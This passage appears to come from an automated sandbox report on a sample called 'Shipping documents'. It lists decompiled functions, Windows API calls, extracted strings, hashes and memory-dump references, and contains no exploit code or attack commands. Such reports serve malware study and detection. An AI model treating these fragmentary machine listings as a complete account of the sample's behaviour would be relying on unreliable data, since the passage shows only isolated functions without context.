                                                                                                          • Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
                                                                                                          Function 0045DA73 Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 141COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                                                                            • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                                                                          • GetDriveTypeW.KERNEL32 ref: 0045DB32
                                                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
                                                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
                                                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
                                                                                                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
                                                                                                          • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                          • API String ID: 1976180769-4113822522
                                                                                                          • Opcode ID: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                                                                          • Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
                                                                                                          • Opcode Fuzzy Hash: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                                                                          • Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A
                                                                                                          Function 00432A10 Relevance: 21.1, APIs: 14, Instructions: 140timeCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                                                                                                          • String ID:
                                                                                                          • API String ID: 461458858-0
                                                                                                          • Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                                                                          • Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
                                                                                                          • Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                                                                          • Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
                                                                                                          Function 0043009D Relevance: 21.1, APIs: 14, Instructions: 134filecommemoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                                                                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                                                                                                          • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 004300F6
                                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00430113
                                                                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                                                                                                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00430150
                                                                                                          • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                                                                                                          • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
                                                                                                          • DeleteObject.GDI32(?), ref: 004301D0
                                                                                                          • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                          • String ID:
                                                                                                          • API String ID: 3969911579-0
                                                                                                          • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                                                                          • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
                                                                                                          • Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                                                                          • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
                                                                                                          Function 004551F5 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 115windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
                                                                                                          • String ID: 0
                                                                                                          • API String ID: 956284711-4108050209
                                                                                                          • Opcode ID: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                                                                          • Instruction ID: b5af5d15e8ca477bb279da78e69062a53aed449fe0dbaae2e4c2ef00f9b57ed5
                                                                                                          • Opcode Fuzzy Hash: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                                                                          • Instruction Fuzzy Hash: 91412770200601AFD714DF64D9A8B6B77A8BF48302F10896DFD45CB292D778E848CFA9
                                                                                                          Function 00433493 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 84networkCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                                          • String ID: 0.0.0.0
                                                                                                          • API String ID: 1965227024-3771769585
                                                                                                          • Opcode ID: 076f4e753302d8e1360c69636e2804f45f3b9e513b8bc5fd0a6f442411ef1df6
                                                                                                          • Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
                                                                                                          • Opcode Fuzzy Hash: 076f4e753302d8e1360c69636e2804f45f3b9e513b8bc5fd0a6f442411ef1df6
                                                                                                          • Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
                                                                                                          Function 0045F56D Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 78COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                          • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
                                                                                                          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
                                                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
                                                                                                          • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
                                                                                                          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
                                                                                                          • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: SendString$_memmove_wcslen
                                                                                                          • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                          • API String ID: 369157077-1007645807
                                                                                                          • Opcode ID: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                                                                          • Instruction ID: e81aaa69409cfefceaf3864659f825962b2ddf67c6d06b6a861a29a56a66176d
                                                                                                          • Opcode Fuzzy Hash: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                                                                          • Instruction Fuzzy Hash: 7F21A83168021D66E720FB95DC46FFE7368AF40700F20087BFA14B71D1DAB4A949879D
                                                                                                          Function 00445BE4 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 77windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetParent.USER32 ref: 00445BF8
                                                                                                          • GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
                                                                                                          • __wcsicoll.LIBCMT ref: 00445C33
                                                                                                          • __wcsicoll.LIBCMT ref: 00445C4F
                                                                                                          • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __wcsicoll$ClassMessageNameParentSend
                                                                                                          • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                          • API String ID: 3125838495-3381328864
                                                                                                          • Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                                                                          • Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
                                                                                                          • Opcode Fuzzy Hash: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                                                                          • Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9
                                                                                                          Function 004491B9 Relevance: 19.7, APIs: 13, Instructions: 246windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
                                                                                                          • SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
                                                                                                          • CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
                                                                                                          • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
                                                                                                          • SendMessageW.USER32(?,?,00000000,?), ref: 00449332
                                                                                                          • SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
                                                                                                          • SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
                                                                                                          • SendMessageW.USER32(?,00000402,?), ref: 00449399
                                                                                                          • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
                                                                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$CharNext
                                                                                                          • String ID:
                                                                                                          • API String ID: 1350042424-0
                                                                                                          • Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                                                                          • Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
                                                                                                          • Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                                                                          • Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
                                                                                                          Function 00478656 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 197COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                                                                            • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                                                                          • GetDriveTypeW.KERNEL32(?), ref: 004787B9
                                                                                                          • _wcscpy.LIBCMT ref: 004787E5
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                                                                                                          • String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                          • API String ID: 3052893215-2127371420
                                                                                                          • Opcode ID: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                                                                          • Instruction ID: 541bc2b2506c052d744bcb7e7e177e26c036821b53f5a58429f0f0853ea8de24
                                                                                                          • Opcode Fuzzy Hash: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                                                                          • Instruction Fuzzy Hash: 4761C1716443018BD700EF14CC85B9BB7D4AB84348F14892FF949AB382DB79E94987AB
                                                                                                          Function 0045E737 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 163COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
                                                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                          • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                                                                                                          • __swprintf.LIBCMT ref: 0045E7F7
                                                                                                          • _wprintf.LIBCMT ref: 0045E8B3
                                                                                                          • _wprintf.LIBCMT ref: 0045E8D7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                                                                          • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                          • API String ID: 2295938435-2354261254
                                                                                                          • Opcode ID: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                                                                          • Instruction ID: 453f5dd12ee62c270a242db3517b58e8b6225e49c0ff470bc5072f32437c925c
                                                                                                          • Opcode Fuzzy Hash: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                                                                          • Instruction Fuzzy Hash: 6A519E71A10219ABDB14EB91CC85EEF7778AF44314F14407EF90477292DB78AE49CBA8
                                                                                                          Function 004531B1 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 160COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __swprintf_wcscpy$__i64tow__itow
                                                                                                          • String ID: %.15g$0x%p$False$True
                                                                                                          • API String ID: 3038501623-2263619337
                                                                                                          • Opcode ID: 1bd516ca49f477e8a3ed3b5693b6511736bfb32664ccdf6525c3e88e5b2a74d5
                                                                                                          • Instruction ID: fd507a47f7d2c8f7f5848ea17d112ce969af4838d766d220e6d3988dad71e25c
                                                                                                          • Opcode Fuzzy Hash: 1bd516ca49f477e8a3ed3b5693b6511736bfb32664ccdf6525c3e88e5b2a74d5
                                                                                                          • Instruction Fuzzy Hash: 264108729001005BDB10EF75DC42FAAB364EF55306F0445ABFE09CB242EA39DA48C79A
                                                                                                          Function 0045E538 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 154COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                                                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                          • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                                                                                                          • __swprintf.LIBCMT ref: 0045E5F6
                                                                                                          • _wprintf.LIBCMT ref: 0045E6A3
                                                                                                          • _wprintf.LIBCMT ref: 0045E6C7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                                                                          • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                          • API String ID: 2295938435-8599901
                                                                                                          • Opcode ID: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                                                                          • Instruction ID: ff3e2b23dced8a629e5b21f12e79e468b5cd48208a3d74017576322ff0354a8f
                                                                                                          • Opcode Fuzzy Hash: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                                                                          • Instruction Fuzzy Hash: 9A519171D00109ABDB14EBA1C845EEF7778EF44304F50847EF91477292EA78AE49CBA8
                                                                                                          Function 00443B61 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 99sleepwindowtimeCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • timeGetTime.WINMM ref: 00443B67
                                                                                                            • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
                                                                                                          • Sleep.KERNEL32(0000000A), ref: 00443B9F
                                                                                                          • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00443BC8
                                                                                                          • SetActiveWindow.USER32(00000000), ref: 00443BEC
                                                                                                          • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
